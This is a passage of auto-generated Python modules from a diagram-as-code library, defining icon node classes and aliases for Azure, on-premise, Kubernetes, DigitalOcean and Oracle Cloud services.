= "disk-snapshots.png" class Disks(_Compute): _icon = "disks.png" class FunctionApps(_Compute): _icon = "function-apps.png" class ImageDefinitions(_Compute): _icon = "image-definitions.png" class ImageVersions(_Compute): _icon = "image-versions.png" class KubernetesServices(_Compute): _icon = "kubernetes-services.png" class MeshApplications(_Compute): _icon = "mesh-applications.png" class OsImages(_Compute): _icon = "os-images.png" class SAPHANAOnAzure(_Compute): _icon = "sap-hana-on-azure.png" class ServiceFabricClusters(_Compute): _icon = "service-fabric-clusters.png" class SharedImageGalleries(_Compute): _icon = "shared-image-galleries.png" class SpringCloud(_Compute): _icon = "spring-cloud.png" class VMClassic(_Compute): _icon = "vm-classic.png" class VMImages(_Compute): _icon = "vm-images.png" class VMLinux(_Compute): _icon = "vm-linux.png" class VMScaleSet(_Compute): _icon = "vm-scale-set.png" class VMWindows(_Compute): _icon = 
"vm-windows.png" class VM(_Compute): _icon = "vm.png" class Workspaces(_Compute): _icon = "workspaces.png" # Aliases ACR = ContainerRegistries AKS = KubernetesServices VMSS = VMScaleSet File: diagrams/onprem/queue.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Queue(_OnPrem): _type = "queue" _icon_dir = "resources/onprem/queue" class Activemq(_Queue): _icon = "activemq.png" class Celery(_Queue): _icon = "celery.png" class Emqx(_Queue): _icon = "emqx.png" class Kafka(_Queue): _icon = "kafka.png" class Nats(_Queue): _icon = "nats.png" class Rabbitmq(_Queue): _icon = "rabbitmq.png" class Zeromq(_Queue): _icon = "zeromq.png" # Aliases ActiveMQ = Activemq EMQX = Emqx RabbitMQ = Rabbitmq ZeroMQ = Zeromq File: diagrams/onprem/auth.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Auth(_OnPrem): _type = "auth" _icon_dir = "resources/onprem/auth" class Boundary(_Auth): _icon = "boundary.png" class BuzzfeedSso(_Auth): _icon = "buzzfeed-sso.png" class Oauth2Proxy(_Auth): _icon = "oauth2-proxy.png" # Aliases File: diagrams/onprem/etl.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Etl(_OnPrem): _type = "etl" _icon_dir = "resources/onprem/etl" class Embulk(_Etl): _icon = "embulk.png" # Aliases File: diagrams/onprem/logging.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Logging(_OnPrem): _type = "logging" _icon_dir = "resources/onprem/logging" class Fluentbit(_Logging): _icon = "fluentbit.png" class Graylog(_Logging): _icon = "graylog.png" class Loki(_Logging): _icon = "loki.png" class Rsyslog(_Logging): _icon = "rsyslog.png" class SyslogNg(_Logging): _icon = "syslog-ng.png" # Aliases FluentBit = Fluentbit RSyslog = Rsyslog File: diagrams/onprem/tracing.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Tracing(_OnPrem): _type = "tracing" _icon_dir = "resources/onprem/tracing" class Jaeger(_Tracing): _icon = "jaeger.png" class Tempo(_Tracing): _icon = "tempo.png" # Aliases File: diagrams/onprem/dns.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Dns(_OnPrem): _type = "dns" _icon_dir = "resources/onprem/dns" class Coredns(_Dns): _icon = "coredns.png" class Powerdns(_Dns): _icon = "powerdns.png" # Aliases File: diagrams/onprem/gitops.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Gitops(_OnPrem): _type = "gitops" _icon_dir = "resources/onprem/gitops" class Argocd(_Gitops): _icon = "argocd.png" class Flagger(_Gitops): _icon = "flagger.png" class Flux(_Gitops): _icon = "flux.png" # Aliases ArgoCD = Argocd File: diagrams/onprem/aggregator.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Aggregator(_OnPrem): _type = "aggregator" _icon_dir = "resources/onprem/aggregator" class Fluentd(_Aggregator): _icon = "fluentd.png" class Vector(_Aggregator): _icon = "vector.png" # Aliases File: diagrams/onprem/registry.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Registry(_OnPrem): _type = "registry" _icon_dir = "resources/onprem/registry" class Harbor(_Registry): _icon = "harbor.png" class Jfrog(_Registry): _icon = "jfrog.png" # Aliases File: diagrams/onprem/ci.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
import _OnPrem class _Ci(_OnPrem): _type = "ci" _icon_dir = "resources/onprem/ci" class Circleci(_Ci): _icon = "circleci.png" class Concourseci(_Ci): _icon = "concourseci.png" class Droneci(_Ci): _icon = "droneci.png" class GithubActions(_Ci): _icon = "github-actions.png" class Gitlabci(_Ci): _icon = "gitlabci.png" class Jenkins(_Ci): _icon = "jenkins.png" class Teamcity(_Ci): _icon = "teamcity.png" class Travisci(_Ci): _icon = "travisci.png" class Zuulci(_Ci): _icon = "zuulci.png" # Aliases CircleCI = Circleci ConcourseCI = Concourseci DroneCI = Droneci GitlabCI = Gitlabci TravisCI = Travisci TC = Teamcity ZuulCI = Zuulci File: diagrams/onprem/monitoring.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Monitoring(_OnPrem): _type = "monitoring" _icon_dir = "resources/onprem/monitoring" class Cortex(_Monitoring): _icon = "cortex.png" class Datadog(_Monitoring): _icon = "datadog.png" class Dynatrace(_Monitoring): _icon = "dynatrace.png" class Grafana(_Monitoring): _icon = "grafana.png" class Humio(_Monitoring): _icon = "humio.png" class Mimir(_Monitoring): _icon = "mimir.png" class Nagios(_Monitoring): _icon = "nagios.png" class Newrelic(_Monitoring): _icon = "newrelic.png" class PrometheusOperator(_Monitoring): _icon = "prometheus-operator.png" class Prometheus(_Monitoring): _icon = "prometheus.png" class Sentry(_Monitoring): _icon = "sentry.png" class Splunk(_Monitoring): _icon = "splunk.png" class Thanos(_Monitoring): _icon = "thanos.png" class Zabbix(_Monitoring): _icon = "zabbix.png" # Aliases File: diagrams/onprem/database.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Database(_OnPrem): _type = "database" _icon_dir = "resources/onprem/database" class Cassandra(_Database): _icon = "cassandra.png" class Clickhouse(_Database): _icon = "clickhouse.png" class Cockroachdb(_Database): _icon = "cockroachdb.png" class Couchbase(_Database): _icon = "couchbase.png" class Couchdb(_Database): _icon = "couchdb.png" class Dgraph(_Database): _icon = "dgraph.png" class Druid(_Database): _icon = "druid.png" class Hbase(_Database): _icon = "hbase.png" class Influxdb(_Database): _icon = "influxdb.png" class Janusgraph(_Database): _icon = "janusgraph.png" class Mariadb(_Database): _icon = "mariadb.png" class Mongodb(_Database): _icon = "mongodb.png" class Mssql(_Database): _icon = "mssql.png" class Mysql(_Database): _icon = "mysql.png" class Neo4J(_Database): _icon = "neo4j.png" class Oracle(_Database): _icon = "oracle.png" class Postgresql(_Database): _icon = "postgresql.png" class Scylla(_Database): _icon = "scylla.png" # Aliases ClickHouse = Clickhouse CockroachDB = Cockroachdb CouchDB = Couchdb HBase = Hbase InfluxDB = Influxdb JanusGraph = Janusgraph MariaDB = Mariadb MongoDB = Mongodb MSSQL = Mssql MySQL = Mysql PostgreSQL = Postgresql File: diagrams/onprem/client.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Client(_OnPrem): _type = "client" _icon_dir = "resources/onprem/client" class Client(_Client): _icon = "client.png" class User(_Client): _icon = "user.png" class Users(_Client): _icon = "users.png" # Aliases File: diagrams/onprem/mlops.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
import _OnPrem class _Mlops(_OnPrem): _type = "mlops" _icon_dir = "resources/onprem/mlops" class Mlflow(_Mlops): _icon = "mlflow.png" class Polyaxon(_Mlops): _icon = "polyaxon.png" # Aliases File: diagrams/onprem/security.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Security(_OnPrem): _type = "security" _icon_dir = "resources/onprem/security" class Bitwarden(_Security): _icon = "bitwarden.png" class Trivy(_Security): _icon = "trivy.png" class Vault(_Security): _icon = "vault.png" # Aliases File: diagrams/onprem/iac.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Iac(_OnPrem): _type = "iac" _icon_dir = "resources/onprem/iac" class Ansible(_Iac): _icon = "ansible.png" class Atlantis(_Iac): _icon = "atlantis.png" class Awx(_Iac): _icon = "awx.png" class Puppet(_Iac): _icon = "puppet.png" class Terraform(_Iac): _icon = "terraform.png" # Aliases File: diagrams/onprem/__init__.py """ OnPrem provides a set of general on-premise services. """ from diagrams import Node class _OnPrem(Node): _provider = "onprem" _icon_dir = "resources/onprem" fontcolor = "#ffffff" File: diagrams/onprem/certificates.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Certificates(_OnPrem): _type = "certificates" _icon_dir = "resources/onprem/certificates" class CertManager(_Certificates): _icon = "cert-manager.png" class LetsEncrypt(_Certificates): _icon = "lets-encrypt.png" # Aliases File: diagrams/onprem/inmemory.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Inmemory(_OnPrem): _type = "inmemory" _icon_dir = "resources/onprem/inmemory" class Aerospike(_Inmemory): _icon = "aerospike.png" class Hazelcast(_Inmemory): _icon = "hazelcast.png" class Memcached(_Inmemory): _icon = "memcached.png" class Redis(_Inmemory): _icon = "redis.png" # Aliases File: diagrams/onprem/container.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Container(_OnPrem): _type = "container" _icon_dir = "resources/onprem/container" class Containerd(_Container): _icon = "containerd.png" class Crio(_Container): _icon = "crio.png" class Docker(_Container): _icon = "docker.png" class Firecracker(_Container): _icon = "firecracker.png" class Gvisor(_Container): _icon = "gvisor.png" class K3S(_Container): _icon = "k3s.png" class Lxc(_Container): _icon = "lxc.png" class Rkt(_Container): _icon = "rkt.png" # Aliases LXC = Lxc RKT = Rkt File: diagrams/onprem/proxmox.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Proxmox(_OnPrem): _type = "proxmox" _icon_dir = "resources/onprem/proxmox" class Pve(_Proxmox): _icon = "pve.png" # Aliases ProxmoxVE = Pve File: diagrams/onprem/vcs.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Vcs(_OnPrem): _type = "vcs" _icon_dir = "resources/onprem/vcs" class Git(_Vcs): _icon = "git.png" class Gitea(_Vcs): _icon = "gitea.png" class Github(_Vcs): _icon = "github.png" class Gitlab(_Vcs): _icon = "gitlab.png" class Svn(_Vcs): _icon = "svn.png" # Aliases File: diagrams/onprem/storage.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
import _OnPrem class _Storage(_OnPrem): _type = "storage" _icon_dir = "resources/onprem/storage" class CephOsd(_Storage): _icon = "ceph-osd.png" class Ceph(_Storage): _icon = "ceph.png" class Glusterfs(_Storage): _icon = "glusterfs.png" class Portworx(_Storage): _icon = "portworx.png" # Aliases CEPH = Ceph CEPH_OSD = CephOsd File: diagrams/onprem/network.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Network(_OnPrem): _type = "network" _icon_dir = "resources/onprem/network" class Ambassador(_Network): _icon = "ambassador.png" class Apache(_Network): _icon = "apache.png" class Bind9(_Network): _icon = "bind-9.png" class Caddy(_Network): _icon = "caddy.png" class Consul(_Network): _icon = "consul.png" class Envoy(_Network): _icon = "envoy.png" class Etcd(_Network): _icon = "etcd.png" class Glassfish(_Network): _icon = "glassfish.png" class Gunicorn(_Network): _icon = "gunicorn.png" class Haproxy(_Network): _icon = "haproxy.png" class Internet(_Network): _icon = "internet.png" class Istio(_Network): _icon = "istio.png" class Jbossas(_Network): _icon = "jbossas.png" class Jetty(_Network): _icon = "jetty.png" class Kong(_Network): _icon = "kong.png" class Linkerd(_Network): _icon = "linkerd.png" class Nginx(_Network): _icon = "nginx.png" class Ocelot(_Network): _icon = "ocelot.png" class OpenServiceMesh(_Network): _icon = "open-service-mesh.png" class Opnsense(_Network): _icon = "opnsense.png" class Pfsense(_Network): _icon = "pfsense.png" class Pomerium(_Network): _icon = "pomerium.png" class Powerdns(_Network): _icon = "powerdns.png" class Tomcat(_Network): _icon = "tomcat.png" class Traefik(_Network): _icon = "traefik.png" class Tyk(_Network): _icon = "tyk.png" class Vyos(_Network): _icon = "vyos.png" class Wildfly(_Network): _icon = "wildfly.png" class Yarp(_Network): _icon = "yarp.png" class Zookeeper(_Network): _icon = "zookeeper.png" # Aliases ETCD = Etcd HAProxy = Haproxy OSM = OpenServiceMesh OPNSense = Opnsense PFSense = Pfsense VyOS = Vyos File: diagrams/onprem/search.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Search(_OnPrem): _type = "search" _icon_dir = "resources/onprem/search" class Solr(_Search): _icon = "solr.png" # Aliases File: diagrams/onprem/analytics.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Analytics(_OnPrem): _type = "analytics" _icon_dir = "resources/onprem/analytics" class Beam(_Analytics): _icon = "beam.png" class Databricks(_Analytics): _icon = "databricks.png" class Dbt(_Analytics): _icon = "dbt.png" class Dremio(_Analytics): _icon = "dremio.png" class Flink(_Analytics): _icon = "flink.png" class Hadoop(_Analytics): _icon = "hadoop.png" class Hive(_Analytics): _icon = "hive.png" class Metabase(_Analytics): _icon = "metabase.png" class Norikra(_Analytics): _icon = "norikra.png" class Powerbi(_Analytics): _icon = "powerbi.png" class Presto(_Analytics): _icon = "presto.png" class Singer(_Analytics): _icon = "singer.png" class Spark(_Analytics): _icon = "spark.png" class Storm(_Analytics): _icon = "storm.png" class Superset(_Analytics): _icon = "superset.png" class Tableau(_Analytics): _icon = "tableau.png" class Trino(_Analytics): _icon = "trino.png" # Aliases PowerBI = Powerbi File: diagrams/onprem/groupware.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
import _OnPrem class _Groupware(_OnPrem): _type = "groupware" _icon_dir = "resources/onprem/groupware" class Nextcloud(_Groupware): _icon = "nextcloud.png" # Aliases File: diagrams/onprem/workflow.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Workflow(_OnPrem): _type = "workflow" _icon_dir = "resources/onprem/workflow" class Airflow(_Workflow): _icon = "airflow.png" class Digdag(_Workflow): _icon = "digdag.png" class Kubeflow(_Workflow): _icon = "kubeflow.png" class Nifi(_Workflow): _icon = "nifi.png" # Aliases KubeFlow = Kubeflow NiFi = Nifi File: diagrams/onprem/identity.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Identity(_OnPrem): _type = "identity" _icon_dir = "resources/onprem/identity" class Dex(_Identity): _icon = "dex.png" # Aliases File: diagrams/onprem/compute.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Compute(_OnPrem): _type = "compute" _icon_dir = "resources/onprem/compute" class Nomad(_Compute): _icon = "nomad.png" class Server(_Compute): _icon = "server.png" # Aliases File: diagrams/onprem/messaging.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Messaging(_OnPrem): _type = "messaging" _icon_dir = "resources/onprem/messaging" class Centrifugo(_Messaging): _icon = "centrifugo.png" # Aliases File: diagrams/onprem/cd.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OnPrem class _Cd(_OnPrem): _type = "cd" _icon_dir = "resources/onprem/cd" class Spinnaker(_Cd): _icon = "spinnaker.png" class TektonCli(_Cd): _icon = "tekton-cli.png" class Tekton(_Cd): _icon = "tekton.png" # Aliases File: diagrams/k8s/controlplane.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _K8S class _Controlplane(_K8S): _type = "controlplane" _icon_dir = "resources/k8s/controlplane" class API(_Controlplane): _icon = "api.png" class CCM(_Controlplane): _icon = "c-c-m.png" class CM(_Controlplane): _icon = "c-m.png" class KProxy(_Controlplane): _icon = "k-proxy.png" class Kubelet(_Controlplane): _icon = "kubelet.png" class Sched(_Controlplane): _icon = "sched.png" # Aliases APIServer = API ControllerManager = CM KubeProxy = KProxy Scheduler = Sched File: diagrams/k8s/clusterconfig.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _K8S class _Clusterconfig(_K8S): _type = "clusterconfig" _icon_dir = "resources/k8s/clusterconfig" class HPA(_Clusterconfig): _icon = "hpa.png" class Limits(_Clusterconfig): _icon = "limits.png" class Quota(_Clusterconfig): _icon = "quota.png" # Aliases LimitRange = Limits HorizontalPodAutoscaler = HPA File: diagrams/k8s/chaos.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _K8S class _Chaos(_K8S): _type = "chaos" _icon_dir = "resources/k8s/chaos" class ChaosMesh(_Chaos): _icon = "chaos-mesh.png" class LitmusChaos(_Chaos): _icon = "litmus-chaos.png" # Aliases File: diagrams/k8s/rbac.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
import _K8S

class _Rbac(_K8S):
    _type = "rbac"
    _icon_dir = "resources/k8s/rbac"

class CRole(_Rbac): _icon = "c-role.png"
class CRB(_Rbac): _icon = "crb.png"
class Group(_Rbac): _icon = "group.png"
class RB(_Rbac): _icon = "rb.png"
class Role(_Rbac): _icon = "role.png"
class SA(_Rbac): _icon = "sa.png"
class User(_Rbac): _icon = "user.png"

# Aliases
ClusterRole = CRole
ClusterRoleBinding = CRB
RoleBinding = RB
ServiceAccount = SA


File: diagrams/k8s/__init__.py

"""
K8S provides a set of services for Kubernetes.
"""

from diagrams import Node

class _K8S(Node):
    _provider = "k8s"
    _icon_dir = "resources/k8s"
    fontcolor = "#2d3436"


File: diagrams/k8s/podconfig.py

# This module is automatically generated by autogen.sh. DO NOT EDIT.

from . import _K8S

class _Podconfig(_K8S):
    _type = "podconfig"
    _icon_dir = "resources/k8s/podconfig"

class CM(_Podconfig): _icon = "cm.png"
class Secret(_Podconfig): _icon = "secret.png"

# Aliases
ConfigMap = CM


File: diagrams/k8s/storage.py

# This module is automatically generated by autogen.sh. DO NOT EDIT.

from . import _K8S

class _Storage(_K8S):
    _type = "storage"
    _icon_dir = "resources/k8s/storage"

class PV(_Storage): _icon = "pv.png"
class PVC(_Storage): _icon = "pvc.png"
class SC(_Storage): _icon = "sc.png"
class Vol(_Storage): _icon = "vol.png"

# Aliases
PersistentVolume = PV
PersistentVolumeClaim = PVC
StorageClass = SC
Volume = Vol


File: diagrams/k8s/network.py

# This module is automatically generated by autogen.sh. DO NOT EDIT.

from . import _K8S

class _Network(_K8S):
    _type = "network"
    _icon_dir = "resources/k8s/network"

class Ep(_Network): _icon = "ep.png"
class Ing(_Network): _icon = "ing.png"
class Netpol(_Network): _icon = "netpol.png"
class SVC(_Network): _icon = "svc.png"

# Aliases
Endpoint = Ep
Ingress = Ing
NetworkPolicy = Netpol
Service = SVC


File: diagrams/k8s/group.py

# This module is automatically generated by autogen.sh. DO NOT EDIT.

from . import _K8S

class _Group(_K8S):
    _type = "group"
    _icon_dir = "resources/k8s/group"

class NS(_Group): _icon = "ns.png"

# Aliases
Namespace = NS


File: diagrams/k8s/infra.py

# This module is automatically generated by autogen.sh. DO NOT EDIT.

from . import _K8S

class _Infra(_K8S):
    _type = "infra"
    _icon_dir = "resources/k8s/infra"

class ETCD(_Infra): _icon = "etcd.png"
class Master(_Infra): _icon = "master.png"
class Node(_Infra): _icon = "node.png"

# Aliases


File: diagrams/k8s/others.py

# This module is automatically generated by autogen.sh. DO NOT EDIT.

from . import _K8S

class _Others(_K8S):
    _type = "others"
    _icon_dir = "resources/k8s/others"

class CRD(_Others): _icon = "crd.png"
class PSP(_Others): _icon = "psp.png"

# Aliases


File: diagrams/k8s/ecosystem.py

# This module is automatically generated by autogen.sh. DO NOT EDIT.

from . import _K8S

class _Ecosystem(_K8S):
    _type = "ecosystem"
    _icon_dir = "resources/k8s/ecosystem"

class ExternalDns(_Ecosystem): _icon = "external-dns.png"
class Helm(_Ecosystem): _icon = "helm.png"
class Krew(_Ecosystem): _icon = "krew.png"
class Kustomize(_Ecosystem): _icon = "kustomize.png"

# Aliases
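Every generated class above is just a `Node` subclass carrying an icon, and the module-level aliases (`Ingress = Ing`, `Service = SVC`, `StorageClass = SC`, and so on) are plain name bindings, so either spelling works in a diagram. A minimal sketch composing the k8s modules listed so far (assuming the top-level `Diagram` context manager and the `>>`/`-` edge operators from the package root, which are not part of these generated files, and Graphviz on the PATH):

```py
from diagrams import Diagram
from diagrams.k8s.network import Ingress, Service
from diagrams.k8s.podconfig import ConfigMap, Secret
from diagrams.k8s.storage import PV, PVC, StorageClass

with Diagram("k8s resources", show=False):
    # Route external traffic through an Ingress to a Service.
    Ingress("example.com") >> Service("web")
    # A claim binds a volume provisioned from a storage class.
    StorageClass("standard") >> PV("volume") >> PVC("claim")
    # Undirected edge between related configuration objects.
    ConfigMap("app-config") - Secret("app-secret")
```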
File: diagrams/k8s/compute.py

# This module is automatically generated by autogen.sh. DO NOT EDIT.

from . import _K8S

class _Compute(_K8S):
    _type = "compute"
    _icon_dir = "resources/k8s/compute"

class Cronjob(_Compute): _icon = "cronjob.png"
class Deploy(_Compute): _icon = "deploy.png"
class DS(_Compute): _icon = "ds.png"
class Job(_Compute): _icon = "job.png"
class Pod(_Compute): _icon = "pod.png"
class RS(_Compute): _icon = "rs.png"
class STS(_Compute): _icon = "sts.png"

# Aliases
Deployment = Deploy
DaemonSet = DS
ReplicaSet = RS
StatefulSet = STS


File: diagrams/digitalocean/database.py

# This module is automatically generated by autogen.sh. DO NOT EDIT.

from . import _DigitalOcean

class _Database(_DigitalOcean):
    _type = "database"
    _icon_dir = "resources/digitalocean/database"

class DbaasPrimaryStandbyMore(_Database): _icon = "dbaas-primary-standby-more.png"
class DbaasPrimary(_Database): _icon = "dbaas-primary.png"
class DbaasReadOnly(_Database): _icon = "dbaas-read-only.png"
class DbaasStandby(_Database): _icon = "dbaas-standby.png"

# Aliases


File: diagrams/digitalocean/__init__.py

"""
DigitalOcean provides a set of services for DigitalOcean provider.
"""

from diagrams import Node

class _DigitalOcean(Node):
    _provider = "digitalocean"
    _icon_dir = "resources/digitalocean"
    fontcolor = "#ffffff"


File: diagrams/digitalocean/storage.py

# This module is automatically generated by autogen.sh. DO NOT EDIT.

from . import _DigitalOcean

class _Storage(_DigitalOcean):
    _type = "storage"
    _icon_dir = "resources/digitalocean/storage"

class Folder(_Storage): _icon = "folder.png"
class Space(_Storage): _icon = "space.png"
class VolumeSnapshot(_Storage): _icon = "volume-snapshot.png"
class Volume(_Storage): _icon = "volume.png"

# Aliases


File: diagrams/digitalocean/network.py

# This module is automatically generated by autogen.sh. DO NOT EDIT.

from . import _DigitalOcean

class _Network(_DigitalOcean):
    _type = "network"
    _icon_dir = "resources/digitalocean/network"

class Certificate(_Network): _icon = "certificate.png"
class DomainRegistration(_Network): _icon = "domain-registration.png"
class Domain(_Network): _icon = "domain.png"
class Firewall(_Network): _icon = "firewall.png"
class FloatingIp(_Network): _icon = "floating-ip.png"
class InternetGateway(_Network): _icon = "internet-gateway.png"
class LoadBalancer(_Network): _icon = "load-balancer.png"
class ManagedVpn(_Network): _icon = "managed-vpn.png"
class Vpc(_Network): _icon = "vpc.png"

# Aliases


File: diagrams/digitalocean/compute.py

# This module is automatically generated by autogen.sh. DO NOT EDIT.

from . import _DigitalOcean

class _Compute(_DigitalOcean):
    _type = "compute"
    _icon_dir = "resources/digitalocean/compute"

class Containers(_Compute): _icon = "containers.png"
class Docker(_Compute): _icon = "docker.png"
class DropletConnect(_Compute): _icon = "droplet-connect.png"
class DropletSnapshot(_Compute): _icon = "droplet-snapshot.png"
class Droplet(_Compute): _icon = "droplet.png"
class K8SCluster(_Compute): _icon = "k8s-cluster.png"
class K8SNodePool(_Compute): _icon = "k8s-node-pool.png"
class K8SNode(_Compute): _icon = "k8s-node.png"

# Aliases
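The DigitalOcean nodes follow the same pattern, so a small topology can be sketched straight from the modules above (again assuming the top-level `Diagram` context manager, the `>>`/`-` operators, and a Graphviz install, none of which come from these generated files):

```py
from diagrams import Diagram
from diagrams.digitalocean.compute import Droplet
from diagrams.digitalocean.database import DbaasPrimary, DbaasStandby
from diagrams.digitalocean.network import LoadBalancer

with Diagram("DigitalOcean web service", show=False):
    primary = DbaasPrimary("db")
    # Fan traffic out from the load balancer to two droplets, then into the database.
    LoadBalancer("lb") >> [Droplet("web1"), Droplet("web2")] >> primary
    # Undirected edge to the standby replica.
    primary - DbaasStandby("standby")
```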
File: diagrams/oci/connectivity.py

# This module is automatically generated by autogen.sh. DO NOT EDIT.

from . import _OCI

class _Connectivity(_OCI):
    _type = "connectivity"
    _icon_dir = "resources/oci/connectivity"

class BackboneWhite(_Connectivity): _icon = "backbone-white.png"
class Backbone(_Connectivity): _icon = "backbone.png"
class CDNWhite(_Connectivity): _icon = "cdn-white.png"
class CDN(_Connectivity): _icon = "cdn.png"
class CustomerDatacenter(_Connectivity): _icon = "customer-datacenter.png"
class CustomerDatacntrWhite(_Connectivity): _icon = "customer-datacntr-white.png"
class CustomerPremiseWhite(_Connectivity): _icon = "customer-premise-white.png"
class CustomerPremise(_Connectivity): _icon = "customer-premise.png"
class DisconnectedRegionsWhite(_Connectivity): _icon = "disconnected-regions-white.png"
class DisconnectedRegions(_Connectivity): _icon = "disconnected-regions.png"
class DNSWhite(_Connectivity): _icon = "dns-white.png"
class DNS(_Connectivity): _icon = "dns.png"
class FastConnectWhite(_Connectivity): _icon = "fast-connect-white.png"
class FastConnect(_Connectivity): _icon = "fast-connect.png"
class NATGatewayWhite(_Connectivity): _icon = "nat-gateway-white.png"
class NATGateway(_Connectivity): _icon = "nat-gateway.png"
class VPNWhite(_Connectivity): _icon = "vpn-white.png"
class VPN(_Connectivity): _icon = "vpn.png"

# Aliases


File: diagrams/oci/monitoring.py

# This module is automatically generated by autogen.sh. DO NOT EDIT.

from . import _OCI

class _Monitoring(_OCI):
    _type = "monitoring"
    _icon_dir = "resources/oci/monitoring"

class AlarmWhite(_Monitoring): _icon = "alarm-white.png"
class Alarm(_Monitoring): _icon = "alarm.png"
class EmailWhite(_Monitoring): _icon = "email-white.png"
class Email(_Monitoring): _icon = "email.png"
class EventsWhite(_Monitoring): _icon = "events-white.png"
class Events(_Monitoring): _icon = "events.png"
class HealthCheckWhite(_Monitoring): _icon = "health-check-white.png"
class HealthCheck(_Monitoring): _icon = "health-check.png"
class NotificationsWhite(_Monitoring): _icon = "notifications-white.png"
class Notifications(_Monitoring): _icon = "notifications.png"
class QueueWhite(_Monitoring): _icon = "queue-white.png"
class Queue(_Monitoring): _icon = "queue.png"
class SearchWhite(_Monitoring): _icon = "search-white.png"
class Search(_Monitoring): _icon = "search.png"
class TelemetryWhite(_Monitoring): _icon = "telemetry-white.png"
class Telemetry(_Monitoring): _icon = "telemetry.png"
class WorkflowWhite(_Monitoring): _icon = "workflow-white.png"
class Workflow(_Monitoring): _icon = "workflow.png"

# Aliases


File: diagrams/oci/database.py

# This module is automatically generated by autogen.sh. DO NOT EDIT.

from . 
import _OCI class _Database(_OCI): _type = "database" _icon_dir = "resources/oci/database" class AutonomousWhite(_Database): _icon = "autonomous-white.png" class Autonomous(_Database): _icon = "autonomous.png" class BigdataServiceWhite(_Database): _icon = "bigdata-service-white.png" class BigdataService(_Database): _icon = "bigdata-service.png" class DatabaseServiceWhite(_Database): _icon = "database-service-white.png" class DatabaseService(_Database): _icon = "database-service.png" class DataflowApacheWhite(_Database): _icon = "dataflow-apache-white.png" class DataflowApache(_Database): _icon = "dataflow-apache.png" class DcatWhite(_Database): _icon = "dcat-white.png" class Dcat(_Database): _icon = "dcat.png" class DisWhite(_Database): _icon = "dis-white.png" class Dis(_Database): _icon = "dis.png" class DMSWhite(_Database): _icon = "dms-white.png" class DMS(_Database): _icon = "dms.png" class ScienceWhite(_Database): _icon = "science-white.png" class Science(_Database): _icon = "science.png" class StreamWhite(_Database): _icon = "stream-white.png" class Stream(_Database): _icon = "stream.png" # Aliases ADB = Autonomous ADBWhite = AutonomousWhite DBService = DatabaseService DBServiceWhite = DatabaseServiceWhite File: diagrams/oci/security.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OCI class _Security(_OCI): _type = "security" _icon_dir = "resources/oci/security" class CloudGuardWhite(_Security): _icon = "cloud-guard-white.png" class CloudGuard(_Security): _icon = "cloud-guard.png" class DDOSWhite(_Security): _icon = "ddos-white.png" class DDOS(_Security): _icon = "ddos.png" class EncryptionWhite(_Security): _icon = "encryption-white.png" class Encryption(_Security): _icon = "encryption.png" class IDAccessWhite(_Security): _icon = "id-access-white.png" class IDAccess(_Security): _icon = "id-access.png" class KeyManagementWhite(_Security): _icon = "key-management-white.png" class KeyManagement(_Security): _icon = "key-management.png" class MaxSecurityZoneWhite(_Security): _icon = "max-security-zone-white.png" class MaxSecurityZone(_Security): _icon = "max-security-zone.png" class VaultWhite(_Security): _icon = "vault-white.png" class Vault(_Security): _icon = "vault.png" class WAFWhite(_Security): _icon = "waf-white.png" class WAF(_Security): _icon = "waf.png" # Aliases File: diagrams/oci/__init__.py """ OCI provides a set of services for Oracle Cloud Infrastructure provider. """ from diagrams import Node class _OCI(Node): _provider = "oci" _icon_dir = "resources/oci" fontcolor = "#312D2A" File: diagrams/oci/devops.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OCI class _Devops(_OCI): _type = "devops" _icon_dir = "resources/oci/devops" class APIGatewayWhite(_Devops): _icon = "api-gateway-white.png" class APIGateway(_Devops): _icon = "api-gateway.png" class APIServiceWhite(_Devops): _icon = "api-service-white.png" class APIService(_Devops): _icon = "api-service.png" class ResourceMgmtWhite(_Devops): _icon = "resource-mgmt-white.png" class ResourceMgmt(_Devops): _icon = "resource-mgmt.png" # Aliases File: diagrams/oci/storage.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
